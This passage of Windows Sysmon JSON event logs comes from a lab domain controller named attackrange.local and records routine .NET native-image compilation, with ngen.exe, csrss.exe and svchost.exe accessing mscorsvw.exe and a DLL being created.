08:05:04.773","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-001089520B00}","TargetProcessId":"4656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6955,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.804\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010CB550B00}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.804","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010CB550B00}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6956,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.804\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010CB550B00}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.804","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010CB550B00}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6957,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010CB550B00}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010CB550B00}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6958,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:04.976\r\nProcessGuid: {41C8662E-2230-5F25-0000-0010CB550B00}\r\nProcessId: 4092\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ffc-0\\Microsoft.ActiveDirectory.TRLParser.dll\r\nCreationUtcTime: 2020-08-01 08:05:04.976","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:04.976","ProcessGuid":"{41C8662E-2230-5F25-0000-0010CB550B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ffc-0\\Microsoft.ActiveDirectory.TRLParser.dll","CreationUtcTime":"2020-08-01 08:05:04.976","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6959,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.992\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21FB-5F25-0000-0010D8AD0A00}\r\nTargetProcessId: 4476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.992","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21FB-5F25-0000-0010D8AD0A00}","TargetProcessId":"4476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6960,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.992\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21FB-5F25-0000-0010D8AD0A00}\r\nTargetProcessId: 4476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.992","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21FB-5F25-0000-0010D8AD0A00}","TargetProcessId":"4476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6961,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.992\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21FB-5F25-0000-0010D8AD0A00}\r\nTargetProcessId: 4476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.992","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21FB-5F25-0000-0010D8AD0A00}","TargetProcessId":"4476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6962,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.023\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010215C0B00}\r\nTargetProcessId: 4464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.023","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010215C0B00}","TargetProcessId":"4464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6963,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.023\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010215C0B00}\r\nTargetProcessId: 4464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 